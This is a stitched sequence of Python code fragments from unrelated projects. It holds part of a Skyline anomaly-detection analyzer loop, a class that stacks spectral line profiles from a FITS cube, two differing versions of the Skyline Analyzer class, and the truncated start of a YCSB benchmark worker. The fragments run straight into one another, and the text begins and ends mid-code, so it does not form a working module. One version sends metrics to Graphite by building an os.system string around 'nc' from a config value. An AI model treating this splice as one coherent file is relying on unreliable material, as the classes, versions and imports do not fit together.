                                        # string '0o644' raised TypeError on
                                        # Python 3 and int('0644') is decimal
                                        # 644, so use the octal literal.
                                        os.chmod(anomaly_check_file, 0o644)
                                        logger.info('added mirage check :: %s,%s,%s' % (metric[1], metric[0], alert[3]))
                                        # Add to the mirage_metrics list
                                        base_name = METRIC_PATTERN.replace(settings.FULL_NAMESPACE, '', 1)
                                        metric = [metric[0], base_name]
                                        self.mirage_metrics.append(metric)
                                        # Alert for analyzer if enabled
                                        if settings.ENABLE_FULL_DURATION_ALERTS:
                                            self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                            trigger_alert(alert, metric)
                                    except:
                                        self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                        trigger_alert(alert, metric)

                            except Exception as e:
                                logger.error('error :: could not send alert: %s' % e)

            # Push to crucible
            # if len(self.crucible_anomalous_metrics) > 0:
            #     logger.info('to do - push to crucible')

            # Write anomalous_metrics to static webapp directory
            if len(self.anomalous_metrics) > 0:
                filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
                with open(filename, 'w') as fh:
                    # Make it JSONP with a handle_data() function
                    anomalous_metrics = list(self.anomalous_metrics)
                    anomalous_metrics.sort(key=operator.itemgetter(1))
                    fh.write('handle_data(%s)' % anomalous_metrics)

            # Using count files rather that multiprocessing.Value to enable metrics for
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                try:
                    algorithm_count_array = []
                    with open(algorithm_count_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_count_array.append(float_value)
                except:
                    algorithm_count_array = False

                if not algorithm_count_array:
                    continue

                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info(
                    'algorithm run count - %s run %s times' % (
                        algorithm, str(number_of_times_algorithm_run)))
                if number_of_times_algorithm_run == 0:
                    continue

                try:
                    algorithm_timings_array = []
                    with open(algorithm_timings_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_timings_array.append(float_value)
                except:
                    algorithm_timings_array = False

                if not algorithm_timings_array:
                    continue

                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info(
                    'algorithm timings count - %s has %s timings' % (
                        algorithm, str(number_of_algorithm_timings)))

                if number_of_algorithm_timings == 0:
                    continue

                try:
                    _sum_of_algorithm_timings = sum(algorithm_timings_array)
                except:
                    logger.error("sum error: " + traceback.format_exc())
                    _sum_of_algorithm_timings = round(0.0, 6)
                    logger.error('error - sum_of_algorithm_timings - %s' % (algorithm))
                    continue

                sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6)
                # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings))

                try:
                    _median_algorithm_timing = determine_median(algorithm_timings_array)
                except:
                    _median_algorithm_timing = round(0.0, 6)
                    logger.error('error - _median_algorithm_timing - %s' % (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)
                # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing))

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' % (
                        algorithm, sum_of_algorithm_timings,
                        median_algorithm_timing))
                use_namespace = skyline_app_graphite_namespace + '.algorithm_breakdown.' + algorithm
                send_metric_name = use_namespace + '.timing.times_run'
                send_graphite_metric(skyline_app, send_metric_name, str(number_of_algorithm_timings))
                send_metric_name = use_namespace + '.timing.total_time'
                send_graphite_metric(skyline_app, send_metric_name, str(sum_of_algorithm_timings))
                send_metric_name = use_namespace + '.timing.median_time'
                send_graphite_metric(skyline_app, send_metric_name, str(median_algorithm_timing))

            run_time = time() - now
            total_metrics = str(len(unique_metrics))
            total_analyzed = str(len(unique_metrics) - sum(exceptions.values()))
            total_anomalies = str(len(self.anomalous_metrics))

            # Log progress
            logger.info('seconds to run    :: %.2f' % run_time)
            logger.info('total metrics     :: %s' % total_metrics)
            logger.info('total analyzed    :: %s' % total_analyzed)
            logger.info('total anomalies   :: %s' % total_anomalies)
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            graphite_run_time = '%.2f' % run_time
            send_metric_name = skyline_app_graphite_namespace + '.run_time'
            send_graphite_metric(skyline_app, send_metric_name, graphite_run_time)

            send_metric_name = skyline_app_graphite_namespace + '.total_analyzed'
            send_graphite_metric(skyline_app, send_metric_name, total_analyzed)

            send_metric_name = skyline_app_graphite_namespace + '.total_anomalies'
            send_graphite_metric(skyline_app, send_metric_name, total_anomalies)

            send_metric_name = skyline_app_graphite_namespace + '.total_metrics'
            send_graphite_metric(skyline_app, send_metric_name, total_metrics)
            for key, value in exceptions.items():
                send_metric_name = '%s.exceptions.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))
            for key, value in anomaly_breakdown.items():
                send_metric_name = '%s.anomaly_breakdown.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                send_metric_name = skyline_app_graphite_namespace + '.duration'
                send_graphite_metric(skyline_app, send_metric_name, str(time_human))

                send_metric_name = skyline_app_graphite_namespace + '.projected'
                send_graphite_metric(skyline_app, send_metric_name, str(projected))

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            # if time() - now < 5:
            #    logger.info('sleeping due to low run time...')
            #    sleep(10)
            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340)
            # Etsy's original for this was a value of 5 seconds which does
            # not make skyline Analyzer very efficient in terms of installations
            # where 100s of 1000s of metrics are being analyzed.  This lead to
            # Analyzer running over several metrics multiple time in a minute
            # and always working.  Therefore this was changed from if you took
            # less than 5 seconds to run only then sleep.  This behaviour
            # resulted in Analyzer analysing a few 1000 metrics in 9 seconds and
            # then doing it again and again in a single minute.  Therefore the
            # ANALYZER_OPTIMUM_RUN_DURATION setting was added to allow this to
            # self optimise in cases where skyline is NOT deployed to analyze
            # 100s of 1000s of metrics.  This relates to optimising performance
            # for any deployments in the few 1000s and 60 second resolution
            # area, e.g. smaller and local deployments.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                logger.info('sleeping for %.2f seconds due to low run time...' % sleep_for)
                sleep(sleep_for)
class load(object):
    """Stack spectral line profiles extracted from a FITS cube at catalog positions.

    The catalog is a delimited text file whose rows are unpacked as
    ``ra, dec, cfreq, weight, id``. Each profile is cut out of the cube by a
    separate process, weighted, and summed by :meth:`stack`.
    """

    def __init__(self, imagename, catalogname, width=1, beam=None,
                 delimiter=",", verbosity=0, beam2pix=False, cores=2):
        """Load the image cube and the catalog, and derive the cut-out sizes.

        :param imagename: FITS image, loaded with ``utils.loadFits``
        :param catalogname: text catalog, loaded with ``numpy.loadtxt``
        :param width: profile width; converted to channels as
            ``int(width*1e6/dfreq)``
        :param beam: restoring beam. A number is used for both axes (divided
            by 3600), a 3-item list/tuple is ``(bmaj, bmin, bpa)`` with the
            first two divided by 3600, ``None`` or ``0`` reads ``bmaj``,
            ``bmin``, ``bpa`` from the FITS header
        :param delimiter: catalog column delimiter
        :param verbosity: passed to ``utils.logger``
        :param beam2pix: when true, :meth:`stack` applies the beam mask and
            gaussian weights before collapsing the stack
        :param cores: maximum number of profile processes running at once
        :raises TypeError: if ``beam`` is not a list, tuple, int, float or None
        """
        self.log = utils.logger(verbosity)
        # Number of profile processes currently running
        self.active = Manager().Value("d", 0)
        self.cores = cores

        self.log.info("Laoding Image data and catalog info")

        self.imagename = imagename
        self.catalogname = catalogname
        self.delimiter = delimiter

        # Load data
        self.catalog = numpy.loadtxt(self.catalogname, delimiter=self.delimiter)
        self.nprofs = len(self.catalog)
        self.data, self.hdr, self.wcs = utils.loadFits(imagename)

        self.ndim = self.hdr["naxis"]
        self.centre = self.wcs.getCentreWCSCoords()
        self.log.info("Image Centre RA,DEC {:+.3g}, {:+.3g} Deg".format(*self.centre))

        # Keep every axis except STOKES, where only index 0 is used
        cubeslice = [slice(None)]*self.ndim
        if self.ndim > 3:
            stokes_ind = self.ndim - utils.fitsInd(self.hdr, "STOKES")
            cubeslice[stokes_ind] = 0

        # A multi-axis index must be a tuple; a list of slices is not
        # accepted by current NumPy.
        self.cube = self.data[tuple(cubeslice)]

        self.profiles = Manager().list([])
        self.weights = Manager().Value("d", 0)

        ind = utils.fitsInd(self.hdr, "FREQ")
        self.crpix = self.hdr["crpix%d" % ind]
        self.crval = self.hdr["crval%d" % ind]
        self.dfreq = self.hdr["cdelt%d" % ind]
        self.freq0 = self.crval + (self.crpix-1)*self.dfreq
        self.nchan = self.hdr["naxis%d" % ind]
        self.width = int(width*1e6/self.dfreq)

        # Find restoring beam in FITS header if not specified.
        # beam == 0 means "not specified"; normalise it first so that it
        # really reaches the header branch below.
        if isinstance(beam, (float, int)) and beam == 0:
            beam = None

        if beam is None:
            try:
                self.bmaj = self.hdr["bmaj"]
                self.bmin = self.hdr["bmin"]
                self.bpa = self.hdr["bpa"]
            except KeyError:
                self.log.critical("Beam not specified, and no beam information in FITS header")
        elif isinstance(beam, (float, int)):
            self.bmaj = self.bmin = beam/3600.
            self.bpa = 0
        elif isinstance(beam, (list, tuple)):
            self.bmaj, self.bmin, self.bpa = beam
            self.bmaj /= 3600.
            self.bmin /= 3600.
        else:
            raise TypeError("Beam must be a list, tuple, int or float")

        self.bmajPix = int(self.bmaj/abs(self.wcs.getXPixelSizeDeg()))
        self.bminPix = int(self.bmin/abs(self.wcs.getXPixelSizeDeg()))

        self.beamPix = self.bmajPix
        self.beam2pix = beam2pix

        self.excluded = Manager().Value("d", 0)
        self.track = Manager().Value("d", 0)
        self.lock = Lock()

    def profile(self, radeg, decdeg, cfreq, weight, pid):
        """Extract one weighted profile cube and release the worker slot.

        The ``active`` counter is decremented on every exit path (extracted,
        skipped, or failed); otherwise :meth:`stack` would wait forever for a
        slot that is never freed.

        :param radeg: right ascension, passed to ``wcs.wcs2pix``
        :param decdeg: declination, passed to ``wcs.wcs2pix``
        :param cfreq: centre frequency of the line
        :param weight: multiplicative weight of this profile
        :param pid: profile number, used in log messages only
        """
        try:
            self._extract_profile(radeg, decdeg, cfreq, weight, pid)
        finally:
            with self.lock:
                self.active.value -= 1

    def _extract_profile(self, radeg, decdeg, cfreq, weight, pid):
        """Cut the profile cube out of ``self.cube``, pad or skip it near an edge."""
        rapix, decpix = self.wcs.wcs2pix(radeg, decdeg)
        cfreqPix = int((cfreq - self.freq0)/self.dfreq)

        # Floor division keeps the channel bounds integral on Python 3
        zstart = cfreqPix - self.width//2
        zend = cfreqPix + self.width//2

        beamPix = self.beamPix

        ystart, yend = (decpix-beamPix/2.), (decpix+beamPix/2.)
        xstart, xend = (rapix-beamPix/2.), (rapix+beamPix/2.)

        self.log.debug("Line profile {:.3f} {:.3f} {:d}-{:d}".format(rapix, decpix, zstart, zend))

        # Slice bounds must be integers; the float values are kept for the
        # edge tests below.
        pcube = self.cube[zstart:zend, int(ystart):int(yend), int(xstart):int(xend)]

        # Check if this profile is with stacking
        if pcube.shape != (self.width, beamPix, beamPix):
            padz, pady, padx = (0, 0), (0, 0), (0, 0)
            diffx, diffy, diffz = 0, 0, 0

            if pcube.shape[0] != self.width:
                diffz = self.width - pcube.shape[0]
                if cfreqPix < self.cube.shape[0]/2:
                    padz = diffz, 0
                else:
                    padz = 0, diffz

            if pcube.shape[1] != beamPix:
                diffy = beamPix - pcube.shape[1]
                if ystart < 0:
                    pady = diffy, 0
                else:
                    pady = 0, diffy

            if pcube.shape[2] != beamPix:
                diffx = beamPix - pcube.shape[2]
                if xstart < 0:
                    padx = diffx, 0
                else:
                    padx = 0, diffx

            # More than half of any axis missing: too close to an edge
            if diffz > self.width/2 or diffx > beamPix/2 or diffy > beamPix/2:
                self.log.debug("Skipping Profile {:d}, its close too an edge (s).".format(pid))
                with self.lock:
                    self.excluded.value += 1
                return
            else:
                npad = padz, pady, padx
                self.log.debug("Profile {:d} is close an edge(s). Padding the exctracted cube by {:s} ".format(pid, repr(npad)))

                pcube = numpy.pad(pcube, pad_width=npad, mode="constant")
        else:
            self.log.debug("Extracting profile {:d}".format(pid))

        with self.lock:
            self.weights.value += weight
            self.track.value += 1
            self.profiles.append(pcube*weight)

    def stack(self):
        """Extract all catalog profiles in parallel and return the stacked profile.

        At most ``self.cores`` profile processes run at a time.

        :return: the weighted stack summed over the two spatial axes and
            divided by the sum of the weights
        """
        nprofs = len(self.catalog)

        self.log.info("Stacking {:d} line profiles".format(nprofs))

        # Run these jobs in parallel
        procs = []
        # A real list, so reported percentages can be removed from it
        range_ = list(range(10, 110, 10))
        print("Progress:"),

        counter = 0
        while counter <= nprofs-1:
            # Compare the counter's value, not the proxy object itself
            if self.active.value >= self.cores:
                continue

            # One catalog row per profile
            ra, dec, cfreq, w, _id = self.catalog[counter]

            proc = Process(target=self.profile, args=(ra, dec, cfreq, w, counter))
            # Claim the slot before the child can release it
            with self.lock:
                self.active.value += 1
            proc.start()
            procs.append(proc)
            counter += 1

            nn = int(self.track.value/float(self.nprofs)*100)
            if nn in range_:
                print("..{:d}%".format(nn)),
                range_.remove(nn)

        for proc in procs:
            proc.join()
        print("..100%\n")

        self.log.info("Have stackem all")
        self.log.info("{:d} out of {:d} profiles were excluded because they "
                      "were too close to an edge".format(self.excluded.value, nprofs))

        stack = numpy.sum(self.profiles, 0)

        if self.beam2pix:
            mask = utils.elliptical_mask(stack[0], self.bmajPix/2, self.bminPix/2, self.bpa)
            stack = utils.gauss_weights(stack, self.bmajPix/2, self.bminPix/2, mask=mask)

        profile = stack.sum((1, 2))/self.weights.value

        return profile

    def fit_gaussian(self, profile):
        """Least-squares fit of ``utils.gauss`` to ``profile``.

        Starts from the profile maximum as peak, the middle channel as mean
        and a sigma of 1.

        :param profile: 1-D array exposing ``max()``
        :return: fitted ``(peak, mu, sigma)`` parameters
        """
        nn = len(profile)
        xx = range(nn)

        import scipy.stats as stats
        from scipy.optimize import leastsq

        sigma = 1  # stats.moment(profile, moment=1)
        # Floor division: a float index is an error on Python 3
        mu = xx[nn//2]
        peak = profile.max()

        def res(p0, x, y):
            peak, mu, sigma = p0
            yf = utils.gauss(x, peak, mu, sigma)
            return y - yf

        params = leastsq(res, (peak, mu, sigma), args=(xx, profile))[0]

        return params
class Analyzer(Thread):
    """
    Thread that, in an endless loop, splits the set of unique metrics held in
    Redis across worker processes, runs the selected algorithms on every
    timeseries, dumps the anomalous metrics to a JSONP file and logs run
    statistics.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        :param parent_pid: pid of the parent process; workers exit as soon as
            it can no longer be signalled
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        # NOTE(review): this lock guards the shared dicts that several worker
        # processes update; that only works if Lock is a multiprocessing
        # lock - confirm against the file's imports.
        self.lock = Lock()
        self.exceptions = Manager().dict()
        self.anomaly_breakdown = Manager().dict()
        self.anomalous_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Exit the current process when either this process or its parent can
        no longer be signalled.
        """
        try:
            # Signal 0 delivers nothing; it only checks that the pid exists.
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except Exception:
            exit(0)

    @staticmethod
    def _assigned_bounds(i, total, processes):
        """
        Return the half-open ``(start, stop)`` index range owned by worker ``i``.

        :param i: 1-based worker number
        :param total: number of metrics to distribute
        :param processes: number of workers the metrics are split across
        :return: ``(start, stop)``; ``start >= stop`` means the worker has
            nothing to do

        The ranges of workers ``1..processes`` are contiguous, never overlap
        and never reach past ``total``.
        """
        keys_per_processor = int(ceil(float(total) / float(processes)))
        assigned_min = (i - 1) * keys_per_processor
        # Clamp so that a partially filled (or empty) last chunk cannot index
        # past the end of the metric list.
        assigned_max = min(total, i * keys_per_processor)
        return assigned_min, assigned_max

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        :param i: 1-based worker number
        :param unique_metrics: list of every metric name to be analyzed
        """
        # Discover assigned metrics
        assigned_min, assigned_max = self._assigned_bounds(
            i, len(unique_metrics), settings.ANALYZER_PROCESSES)

        # Compile assigned metrics (an inverted range slices to an empty list)
        assigned_metrics = unique_metrics[assigned_min:assigned_max]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for position, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[position]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries)

                # If it's anomalous, add it to list
                if anomalous:
                    metric = [datapoint, metric_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for algorithm_index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[algorithm_index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except AttributeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except Exception:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                self.anomaly_breakdown[key] = self.anomaly_breakdown.get(key, 0) + value

            for key, value in exceptions.items():
                self.exceptions[key] = self.exceptions.get(key, 0) + value

    def run(self):
        """
        Called when the process initializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except Exception:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname( __file__ ), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                anomalous_metrics = list(self.anomalous_metrics)
                anomalous_metrics.sort(key=operator.itemgetter(1))
                fh.write('handle_data(%s)' % anomalous_metrics)

            # Log progress
            logger.info('seconds to run :: %.2f' % (time() - now))
            logger.info('total metrics :: %d' % len(unique_metrics))
            logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(self.exceptions.values())))
            logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats :: %s' % self.exceptions)
            logger.info('anomaly breakdown :: %s' % self.anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                if timeseries:
                    # Float division: with integer timestamps a span shorter
                    # than an hour must not truncate to zero.
                    time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600.0
                    logger.info('canary duration :: %.2f' % time_human)

                    # The projection is undefined when the canary spans no time.
                    projected = None
                    if time_human:
                        projected = 24 * (time() - now) / time_human

                    if settings.GRAPHITE_HOST != '':
                        host = settings.GRAPHITE_HOST.replace('http://', '')
                        system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                        if projected is not None:
                            system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))

            # Reset counters. The shared containers are emptied in place, the
            # same way the anomalous_metrics list is, instead of starting a
            # new Manager for each dict on every cycle.
            self.anomalous_metrics[:] = []
            self.exceptions.clear()
            self.anomaly_breakdown.clear()

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
class Analyzer(Thread):
    """
    Thread that, in an endless loop, splits the set of unique metrics held in
    Redis across worker processes, runs the selected algorithms on every
    timeseries, sends alerts, dumps the anomalous metrics to a JSONP file and
    reports run statistics to the log and to Graphite.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        :param parent_pid: pid of the parent process; workers exit as soon as
            it can no longer be signalled
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        # Workers report their per-process counters through these queues and
        # run() sums them up after the workers have been joined.
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Exit the current process when either this process or its parent can
        no longer be signalled.
        """
        try:
            # Signal 0 delivers nothing; it only checks that the pid exists.
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except Exception:
            exit(0)

    def send_graphite_metric(self, name, value):
        """
        Send a single ``name value timestamp`` line to Carbon.

        :param name: metric name
        :param value: metric value, already formatted
        :return: True when the line was sent, False when Graphite is not
            configured or the connection could not be established
        """
        if settings.GRAPHITE_HOST == '':
            return False

        endpoint = (settings.CARBON_HOST.replace('http://', ''), settings.CARBON_PORT)
        sock = socket.socket()
        try:
            try:
                sock.connect(endpoint)
            except socket.error:
                # An unreachable Graphite must not take the analyzer loop down.
                logger.error('Cannot connect to Graphite at %s:%s' % endpoint)
                return False
            sock.sendall('%s %s %i\n' % (name, value, time()))
        finally:
            sock.close()
        return True

    @staticmethod
    def _assigned_bounds(i, total, processes):
        """
        Return the half-open ``(start, stop)`` index range owned by worker ``i``.

        :param i: 1-based worker number
        :param total: number of metrics to distribute
        :param processes: number of workers the metrics are split across
        :return: ``(start, stop)``; ``start >= stop`` means the worker has
            nothing to do

        The ranges of workers ``1..processes`` are contiguous, never overlap
        and never reach past ``total``.
        """
        keys_per_processor = int(ceil(float(total) / float(processes)))
        assigned_min = (i - 1) * keys_per_processor
        # Clamp so that a partially filled (or empty) last chunk cannot index
        # past the end of the metric list.
        assigned_max = min(total, i * keys_per_processor)
        return assigned_min, assigned_max

    @staticmethod
    def _collate(queue):
        """
        Drain ``queue`` of ``(key, value)`` pairs and return a dict holding
        the sum of the values seen for each key.
        """
        totals = dict()
        while 1:
            try:
                key, value = queue.get_nowait()
            except Empty:
                break
            totals[key] = totals.get(key, 0) + value
        return totals

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        :param i: 1-based worker number
        :param unique_metrics: list of every metric name to be analyzed
        """
        # Discover assigned metrics
        assigned_min, assigned_max = self._assigned_bounds(
            i, len(unique_metrics), settings.ANALYZER_PROCESSES)

        # Compile assigned metrics (an inverted range slices to an empty list)
        assigned_metrics = unique_metrics[assigned_min:assigned_max]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for position, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[position]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for algorithm_index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[algorithm_index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except Exception:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process initializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except Exception:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            anomaly_breakdown = self._collate(self.anomaly_breakdown_q)
            exceptions = self._collate(self.exceptions_q)

            # Read the shared list once; every access to the proxy is a round
            # trip to the manager process.
            anomalous_metrics = list(self.anomalous_metrics)

            # Send alerts
            if settings.ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in anomalous_metrics:
                        if alert[0] in metric[1]:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    # The expiring key suppresses repeat alerts
                                    # for the same metric until it times out.
                                    self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric)

                            except Exception as e:
                                logger.error("couldn't send alert: %s" % e)

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                fh.write('handle_data(%s)' % sorted(anomalous_metrics, key=operator.itemgetter(1)))

            # Log progress
            total_analyzed = len(unique_metrics) - sum(exceptions.values())
            logger.info('seconds to run :: %.2f' % (time() - now))
            logger.info('total metrics :: %d' % len(unique_metrics))
            logger.info('total analyzed :: %d' % total_analyzed)
            logger.info('total anomalies :: %d' % len(anomalous_metrics))
            logger.info('exception stats :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('skyline.analyzer.run_time', '%.2f' % (time() - now))
            self.send_graphite_metric('skyline.analyzer.total_analyzed', '%.2f' % total_analyzed)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                if timeseries:
                    # Float division: with integer timestamps a span shorter
                    # than an hour must not truncate to zero.
                    time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600.0
                    logger.info('canary duration :: %.2f' % time_human)
                    self.send_graphite_metric('skyline.analyzer.duration', '%.2f' % time_human)

                    # The projection is undefined when the canary spans no time.
                    if time_human:
                        projected = 24 * (time() - now) / time_human
                        self.send_graphite_metric('skyline.analyzer.projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
class YCSBWorker(object):
    """
    Run a YCSB workload in ``access_settings.workers`` parallel processes and
    aggregate the throughput and 95th percentile latencies found in the
    exported result files.
    """

    # Maps the (section, measurement) pair of an export line to the result
    # list the value is collected in.
    _RESULT_KEYS = {
        ("[OVERALL]", "Throughput(ops/sec)"): 'Throughput',
        ("[READ]", "95thPercentileLatency(us)"): 'READ_95',
        ("[UPDATE]", "95thPercentileLatency(us)"): 'UPDATE_95',
        ("[INSERT]", "95thPercentileLatency(us)"): 'INSERT_95',
